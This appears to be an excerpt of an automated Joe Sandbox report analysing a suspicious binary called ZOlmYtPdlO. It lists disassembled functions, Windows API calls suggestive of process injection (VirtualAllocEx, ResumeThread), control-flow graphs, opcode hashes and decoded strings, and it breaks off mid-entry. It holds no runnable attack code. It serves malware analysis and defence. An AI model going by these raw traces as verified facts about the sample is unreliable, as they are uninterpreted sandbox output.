                                                      • Instruction Fuzzy Hash: 782137B1D003098FDB10DFAAC4857EEBBF5AB48324F108429D459A7241CB789944CFA5
                                                      Function 0094D700 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0094D787
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764461525.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_940000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 29d3726d5226e37c4e0c0378d12559395cb04a797b7c37504d39c70d49c0256e
                                                      • Instruction ID: 952ac1d88d429d23176be356a9812e996938e13cbac69623c9c23d4245f9f22a
                                                      • Opcode Fuzzy Hash: 29d3726d5226e37c4e0c0378d12559395cb04a797b7c37504d39c70d49c0256e
                                                      • Instruction Fuzzy Hash: 7221E4B5900348DFDB10CF9AD584AEEBBF8EB48310F14801AE918A3310D374A944CFA4
                                                      Function 069C7501 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 069C7576
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 31b1e32b58512450e2b2bc7f3211197d96a92ba77e69f762b412f2891d4121a2
                                                      • Instruction ID: 2078fcdb7a46428785a5a8082bb827edc66010cd068b10b7740f1554b2314656
                                                      • Opcode Fuzzy Hash: 31b1e32b58512450e2b2bc7f3211197d96a92ba77e69f762b412f2891d4121a2
                                                      • Instruction Fuzzy Hash: 3F1159B5C002489FCB10DFAAC8446EEBFF5EF88320F208819E519A7250CB759544CFA1
                                                      Function 069C7508 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 069C7576
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 14db3972c51bd233637f4668997902a59dd909110fc27fe7c538d3b40065ffcd
                                                      • Instruction ID: e69a22533e6b18fd436f4ba73e983cbbbc8eab6669fe335772a3122cb35875eb
                                                      • Opcode Fuzzy Hash: 14db3972c51bd233637f4668997902a59dd909110fc27fe7c538d3b40065ffcd
                                                      • Instruction Fuzzy Hash: 381137B19002499FCB10DFAAC844BEEBFF5EF88320F208419E559A7250C775A954CFA5
                                                      Function 069C7379 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 67158697e4a7f8e8ed7a1911959179708a47fd08a30f7b882af010989dd93ff0
                                                      • Instruction ID: 38532de57dcac844b123ea33673f3a5f8566fc216d43162a333e679a2e77d1cc
                                                      • Opcode Fuzzy Hash: 67158697e4a7f8e8ed7a1911959179708a47fd08a30f7b882af010989dd93ff0
                                                      • Instruction Fuzzy Hash: 841158B1D003488FCB20DFAAC8447EEFBF4EB88324F20882AD459A7250CA759944CF95
                                                      Function 069C7380 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 24b3602cf43ceed3218dfe87b398e145dbbb078fc2ac76e853c2286c9c7370fc
                                                      • Instruction ID: 86c3a4591826b1c9b3991eb28b5e0266af6a44f9d740f43a4cec9e9fcea2b529
                                                      • Opcode Fuzzy Hash: 24b3602cf43ceed3218dfe87b398e145dbbb078fc2ac76e853c2286c9c7370fc
                                                      • Instruction Fuzzy Hash: 3C113AB1D003498FCB14DFAAC4457EEFBF4EB88324F208419D459A7250CB75A944CFA5
                                                      Function 0094B420 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0094B486
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764461525.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_940000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: ff228ffb0480dea73633a413fc070c1090b22cea6eb6901a8358f0a5aa72efa9
                                                      • Instruction ID: 254ea9937b1528acc4e72826768f0361d6dd092dd8ce3a5703df49e38e00c9a8
                                                      • Opcode Fuzzy Hash: ff228ffb0480dea73633a413fc070c1090b22cea6eb6901a8358f0a5aa72efa9
                                                      • Instruction Fuzzy Hash: B911E0B5C003498FCB10DF9AC444ADEFBF8AB88324F10846AD859B7221D379A945CFA5
                                                      Function 069C8718 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 069CAF45
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      • Opcode ID: f3dc0f452fb80e84144c1d514cf3ede9dcc453f76cee5a4001a9552f29700f33
                                                      • Instruction ID: bdfb1522165597d3027d9660fe5c6d1b0aa12f6c2cd75997630c2e22948f4735
                                                      • Opcode Fuzzy Hash: f3dc0f452fb80e84144c1d514cf3ede9dcc453f76cee5a4001a9552f29700f33
                                                      • Instruction Fuzzy Hash: 4F1106B5800348DFDB10DF9AC884BEEBBF8EB48320F108459E559A7610C375A944CFA1
                                                      Function 069CAEE0 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 069CAF45
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      • Opcode ID: 37533264e795b2c627ab3471a5ba37644726d0fca86281530d65f991589176e2
                                                      • Instruction ID: 5126e9428fabece1ad01dad720b3f71ad9bfbc9071744ff35a590eaf766ca94f
                                                      • Opcode Fuzzy Hash: 37533264e795b2c627ab3471a5ba37644726d0fca86281530d65f991589176e2
                                                      • Instruction Fuzzy Hash: D611F5B58003499FDB10CF9AC884BDEFFF8EB48324F108459E959A7650D375A944CFA5
                                                      Function 008ED4C4 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764232332.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_8ed000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0e58b94346c74e01fb01db897d9047f36bed19800cdeeb22c31f49436e860a1a
                                                      • Instruction ID: 900a59333288efdfe501a2735c2c5f80b1aac0d99d27823064260924e3d7c263
                                                      • Opcode Fuzzy Hash: 0e58b94346c74e01fb01db897d9047f36bed19800cdeeb22c31f49436e860a1a
                                                      • Instruction Fuzzy Hash: 53213472504384DFCB05DF15D9C0B2BBF65FB98318F20C569E8098B256C336D85ACBA2
                                                      Function 008ED3D8 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764232332.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_8ed000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 52a01a37edb90204163989f884950a7be31d2f3d1a6f9a19f2296a9b93be26b4
                                                      • Instruction ID: 91f59101d64610c2ab96fbc2dd89be288c9f67d89b27eb3bf65dbe2ff8e06f25
                                                      • Opcode Fuzzy Hash: 52a01a37edb90204163989f884950a7be31d2f3d1a6f9a19f2296a9b93be26b4
                                                      • Instruction Fuzzy Hash: 54213A71504384DFDB05DF15D9C0B16BFA5FBA5318F20C169E9098F296C336E85AC7A2
                                                      Function 008FD01C Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764296507.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_8fd000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4c97e77f110a0c173486c8e44e58f122ff4be602f29d4b8cfe577216ef6c2e75
                                                      • Instruction ID: 419fff927b7d1e2f2e67b815db0a6f8000a29acfd0dbfd396e1d7343e9dadf39
                                                      • Opcode Fuzzy Hash: 4c97e77f110a0c173486c8e44e58f122ff4be602f29d4b8cfe577216ef6c2e75
                                                      • Instruction Fuzzy Hash: 5221F571504708DFDB14DF24D584B26BB66FBC4314F20C569DB098B356CB3AD847CA61
                                                      Function 008FD1D4 Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764296507.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_8fd000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0d6ab55c67468b1de90a98ba807916626707911eee36b25b40d5faa9ce51f18c
                                                      • Instruction ID: 8870051f791399723db60cd4a628c567c502f68e1f8be95a597935cb3e1e66e7
                                                      • Opcode Fuzzy Hash: 0d6ab55c67468b1de90a98ba807916626707911eee36b25b40d5faa9ce51f18c
                                                      • Instruction Fuzzy Hash: 4E210771504308DFDB05DF24D5C4B36BBA6FB84318F20C56DDB098B255C336E846CAA1
                                                      Function 008ED3D3 Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764232332.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_8ed000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                      • Instruction ID: d49b323c82fef08a63c33289d743884465759cfbb7c2b71d25de91e8c9da7651
                                                      • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                      • Instruction Fuzzy Hash: 1311DF76404380CFCB02CF00D5C4B16BF71FBA4328F24C2A9D8094B256C33AE85ACBA1
                                                      Function 008ED4BF Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764232332.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_8ed000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                      • Instruction ID: 3330c689c45aa7897cbb180579b3747aa3eeee490ab5a841e9b73db756940678
                                                      • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                      • Instruction Fuzzy Hash: A311B176504380CFCB16CF14D9C4B16BF71FB94318F24C6AAD8494B656C336D85ACBA1
                                                      Function 008FD1CF Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764296507.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_8fd000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                      • Instruction ID: 2626c95c78107abf64b95225c5b6695220254304b8c310642941d797f0a3205d
                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                      • Instruction Fuzzy Hash: 7211BE75504344DFCB02CF20C5C4B25BB62FB84314F24C6AADA498B256C33AE80ACB91
                                                      Function 008FD017 Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764296507.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_8fd000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                      • Instruction ID: d2cfdcd8f217cc85eaa34925b9b3920171c4983938793c1bba417af50da9b747
                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                      • Instruction Fuzzy Hash: 4A11BE75504784CFCB15CF24D5C4B25FB62FB84314F24C6AADA098B656C33AD80ACB61

                                                      Execution Graph

                                                      Execution Coverage:15.6%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:44
                                                      Total number of Limit Nodes:8
                                                      execution_graph 19794 6d89c70 19795 6d89c9d 19794->19795 19797 6d8bb7f 19795->19797 19799 6d89fa6 19795->19799 19800 6d89328 19795->19800 19798 6d89328 LdrInitializeThunk 19798->19799 19799->19797 19799->19798 19801 6d8933a 19800->19801 19803 6d8933f 19800->19803 19801->19799 19802 6d89a69 LdrInitializeThunk 19802->19801 19803->19801 19803->19802 19804 303e018 19805 303e024 19804->19805 19813 6d82968 19805->19813 19807 303e109 19824 6d8fc68 19807->19824 19828 6d8fc5f 19807->19828 19808 303e61f 19814 6d8298a 19813->19814 19815 303e0c3 19814->19815 19818 6d89328 LdrInitializeThunk 19814->19818 19832 6d89548 19814->19832 19838 6d8992c 19814->19838 19844 6d89318 19814->19844 19820 6d8f3b8 19815->19820 19818->19815 19821 6d8f3da 19820->19821 19822 6d89548 2 API calls 19821->19822 19823 6d8f4a4 19821->19823 19822->19823 19823->19807 19825 6d8fc8a 19824->19825 19826 6d89548 2 API calls 19825->19826 19827 6d8fd3a 19825->19827 19826->19827 19827->19808 19829 6d8fc8a 19828->19829 19830 6d89548 2 API calls 19829->19830 19831 6d8fd3a 19829->19831 19830->19831 19831->19808 19834 6d89579 19832->19834 19833 6d896d9 19833->19815 19834->19833 19836 6d89924 LdrInitializeThunk 19834->19836 19837 6d89328 LdrInitializeThunk 19834->19837 19836->19833 19837->19834 19839 6d897e3 19838->19839 19841 6d89924 LdrInitializeThunk 19839->19841 19843 6d89328 LdrInitializeThunk 19839->19843 19842 6d89a81 19841->19842 19842->19815 19843->19839 19845 6d8933a 19844->19845 19849 6d8933f 19844->19849 19845->19815 19846 6d89924 LdrInitializeThunk 19846->19845 19848 6d89328 LdrInitializeThunk 19848->19849 19849->19845 19849->19846 19849->19848

                                                      Executed Functions

                                                      Function 03037118 Relevance: 6.6, Strings: 5, Instructions: 360COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 147 3037118-303713b 148 3037146-3037166 147->148 149 303713d-3037143 147->149 152 3037168 148->152 153 303716d-3037174 148->153 149->148 154 30374fc-3037505 152->154 155 3037176-3037181 153->155 156 3037187-303719a 155->156 157 303750d-3037519 155->157 160 30371b0-30371cb 156->160 161 303719c-30371aa 156->161 162 303751b 157->162 163 303751e-3037521 157->163 170 30371ef-30371f2 160->170 171 30371cd-30371d3 160->171 161->160 168 3037484-303748b 161->168 162->163 164 3037523 163->164 165 3037526-3037549 163->165 164->165 172 3037552-3037556 165->172 173 303754b-3037550 165->173 168->154 176 303748d-303748f 168->176 177 30371f8-30371fb 170->177 178 303734c-3037352 170->178 174 30371d5 171->174 175 30371dc-30371df 171->175 179 303755c-303755d 172->179 173->179 174->175 174->178 180 3037212-3037218 174->180 181 303743e-3037441 174->181 175->180 182 30371e1-30371e4 175->182 183 3037491-3037496 176->183 184 303749e-30374a4 176->184 177->178 186 3037201-3037207 177->186 178->181 185 3037358-303735d 178->185 187 303721a-303721c 180->187 188 303721e-3037220 180->188 189 3037447-303744d 181->189 190 3037508 181->190 191 30371ea 182->191 192 303727e-3037284 182->192 183->184 184->157 193 30374a6-30374ab 184->193 185->181 186->178 194 303720d 186->194 196 303722a-3037233 187->196 188->196 197 3037472-3037476 189->197 198 303744f-3037457 189->198 190->157 191->181 192->181 195 303728a-3037290 192->195 199 30374f0-30374f3 193->199 200 30374ad-30374b2 193->200 194->181 201 3037292-3037294 195->201 202 3037296-3037298 195->202 204 3037246-303726e 196->204 205 3037235-3037240 196->205 197->168 206 3037478-303747e 197->206 198->157 203 303745d-303746c 198->203 199->190 207 30374f5-30374fa 199->207 200->190 208 30374b4 200->208 209 30372a2-30372b9 201->209 202->209 203->160 203->197 228 3037362-3037398 204->228 229 3037274-3037279 204->229 205->181 205->204 206->155 206->168 207->154 207->176 210 30374bb-30374c0 208->210 221 30372e4-303730b 209->221 222 30372bb-30372d4 209->222 211 30374e2-30374e4 210->211 212 30374c2-30374c4 210->212 211->190 219 30374e6-30374e9 211->219 216 30374d3-30374d9 212->216 217 30374c6-30374cb 212->217 216->157 220 30374db-30374e0 216->220 217->216 219->199 220->211 224 30374b6-30374b9 220->224 221->190 232 3037311-3037314 221->232 222->228 233 30372da-30372df 222->233 224->190 224->210 235 30373a5-30373ad 228->235 236 303739a-303739e 228->236 229->228 232->190 237 303731a-3037343 232->237 233->228 235->190 240 30373b3-30373b8 235->240 238 30373a0-30373a3 236->238 239 30373bd-30373c1 236->239 237->228 252 3037345-303734a 237->252 238->235 238->239 241 30373c3-30373c9 239->241 242 30373e0-30373e4 239->242 240->181 241->242 244 30373cb-30373d3 241->244 245 30373e6-30373ec 242->245 246 30373ee-303740d call 30376f1 242->246 244->190 247 30373d9-30373de 244->247 245->246 249 3037413-3037417 245->249 246->249 247->181 249->181 250 3037419-3037435 249->250 250->181 252->228
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                                      • API String ID: 0-2525668591
                                                      • Opcode ID: 96ad47c612a72335bfe7f1d10efa36116abee67095fbb3a4a0b43159ccd5513e
                                                      • Instruction ID: 5ae0f7551e2b9e77537b4eb139b70444358c0cbc377c979c20e30dd7744f7ece
                                                      • Opcode Fuzzy Hash: 96ad47c612a72335bfe7f1d10efa36116abee67095fbb3a4a0b43159ccd5513e
                                                      • Instruction Fuzzy Hash: 37E16FB1A01115DFCB58CF69C884AADBBFAFF8A700F198455E845AB361D730EC41CB51
                                                      Function 0303C146 Relevance: 6.5, Strings: 5, Instructions: 224COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 254 303c146-303c158 255 303c184 254->255 256 303c15a-303c172 254->256 257 303c186-303c18a 255->257 260 303c174-303c179 256->260 261 303c17b-303c17e 256->261 260->257 262 303c180-303c182 261->262 263 303c18b-303c199 261->263 262->255 262->256 265 303c1f7-303c1fc 263->265 266 303c19b-303c1a1 263->266 267 303c1ff-303c2ac call 30341a0 call 3033cc0 265->267 266->267 268 303c1a3-303c1c8 266->268 280 303c2b3-303c2d4 call 3035658 267->280 281 303c2ae 267->281 269 303c1ca 268->269 270 303c1cf-303c1f4 268->270 269->270 270->265 283 303c2d9-303c2e4 280->283 281->280 284 303c2e6 283->284 285 303c2eb-303c2ef 283->285 284->285 286 303c2f1-303c2f2 285->286 287 303c2f4-303c2fb 285->287 288 303c313-303c357 286->288 289 303c302-303c310 287->289 290 303c2fd 287->290 294 303c3bd-303c3d4 288->294 289->288 290->289 296 303c3d6-303c3fb 294->296 297 303c359-303c36f 294->297 303 303c413 296->303 304 303c3fd-303c412 296->304 301 303c371-303c37d 297->301 302 303c399 297->302 305 303c387-303c38d 301->305 306 303c37f-303c385 301->306 307 303c39f-303c3bc 302->307 304->303 308 303c397 305->308 306->308 307->294 308->307
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: 176b14791046dfdc65ca0822661b2a9eb8d43a90efb16576b56334ffffaff9e0
                                                      • Instruction ID: 1ef814a5a00b25bb9ce8309ae73b420ff48353ccaeb9f0798f54d0693e988aab
                                                      • Opcode Fuzzy Hash: 176b14791046dfdc65ca0822661b2a9eb8d43a90efb16576b56334ffffaff9e0
                                                      • Instruction Fuzzy Hash: D8A1D674E05218DFEB14DFA9D884A9DBBF6BF8A300F148069E409EB365DB349941CF51
                                                      Function 03035362 Relevance: 6.4, Strings: 5, Instructions: 193COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 312 3035362-30353a0 313 30353a2 312->313 314 30353a7-3035484 call 30341a0 call 3033cc0 312->314 313->314 324 3035486 314->324 325 303548b-30354a9 314->325 324->325 355 30354ac call 3035649 325->355 356 30354ac call 3035658 325->356 326 30354b2-30354bd 327 30354c4-30354c8 326->327 328 30354bf 326->328 329 30354ca-30354cb 327->329 330 30354cd-30354d4 327->330 328->327 331 30354ec-3035530 329->331 332 30354d6 330->332 333 30354db-30354e9 330->333 337 3035596-30355ad 331->337 332->333 333->331 339 3035532-3035548 337->339 340 30355af-30355d4 337->340 344 3035572 339->344 345 303554a-3035556 339->345 346 30355d6-30355eb 340->346 347 30355ec 340->347 350 3035578-3035595 344->350 348 3035560-3035566 345->348 349 3035558-303555e 345->349 346->347 351 3035570 348->351 349->351 350->337 351->350 355->326 356->326
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: cce1123863b98743668cdbf8b6986060fe9cf88307134c35939d583d822962de
                                                      • Instruction ID: 9d982cc6814d6aaf2a4526a7c95a1b06617ecb68706b9af45a76ac0dfeb1a9f4
                                                      • Opcode Fuzzy Hash: cce1123863b98743668cdbf8b6986060fe9cf88307134c35939d583d822962de
                                                      • Instruction Fuzzy Hash: 5191E674E01218CFDB58DFAAD994A9DBBF2BF89300F14C069E409AB365DB349945CF50
                                                      Function 0303C738 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 357 303c738-303c768 358 303c76a 357->358 359 303c76f-303c84c call 30341a0 call 3033cc0 357->359 358->359 369 303c853-303c874 call 3035658 359->369 370 303c84e 359->370 372 303c879-303c884 369->372 370->369 373 303c886 372->373 374 303c88b-303c88f 372->374 373->374 375 303c891-303c892 374->375 376 303c894-303c89b 374->376 377 303c8b3-303c8f7 375->377 378 303c8a2-303c8b0 376->378 379 303c89d 376->379 383 303c95d-303c974 377->383 378->377 379->378 385 303c976-303c99b 383->385 386 303c8f9-303c90f 383->386 392 303c9b3 385->392 393 303c99d-303c9b2 385->393 390 303c911-303c91d 386->390 391 303c939 386->391 394 303c927-303c92d 390->394 395 303c91f-303c925 390->395 396 303c93f-303c95c 391->396 393->392 397 303c937 394->397 395->397 396->383 397->396
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: 50945011aad63ba53f5855a510049fed622a7d7b6369663939743670ba846fae
                                                      • Instruction ID: 277965f7bbeabdadbd3752593dbc08ceae61411a8cf199762d82f2f98204a01f
                                                      • Opcode Fuzzy Hash: 50945011aad63ba53f5855a510049fed622a7d7b6369663939743670ba846fae
                                                      • Instruction Fuzzy Hash: 2E81D574E01218DFEB54DFAAD984A9DBBF6BF89300F14C06AE418AB365DB349941CF50
                                                      Function 0303CA08 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 401 303ca08-303ca38 403 303ca3a 401->403 404 303ca3f-303cb1c call 30341a0 call 3033cc0 401->404 403->404 414 303cb23-303cb44 call 3035658 404->414 415 303cb1e 404->415 417 303cb49-303cb54 414->417 415->414 418 303cb56 417->418 419 303cb5b-303cb5f 417->419 418->419 420 303cb61-303cb62 419->420 421 303cb64-303cb6b 419->421 422 303cb83-303cbc7 420->422 423 303cb72-303cb80 421->423 424 303cb6d 421->424 428 303cc2d-303cc44 422->428 423->422 424->423 430 303cc46-303cc6b 428->430 431 303cbc9-303cbdf 428->431 437 303cc83 430->437 438 303cc6d-303cc82 430->438 435 303cbe1-303cbed 431->435 436 303cc09 431->436 439 303cbf7-303cbfd 435->439 440 303cbef-303cbf5 435->440 441 303cc0f-303cc2c 436->441 438->437 442 303cc07 439->442 440->442 441->428 442->441
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: eee3698a11eb9e130ca044ca58724acf6f9bfd65e0b128ff59f9e1b4ca4a44cd
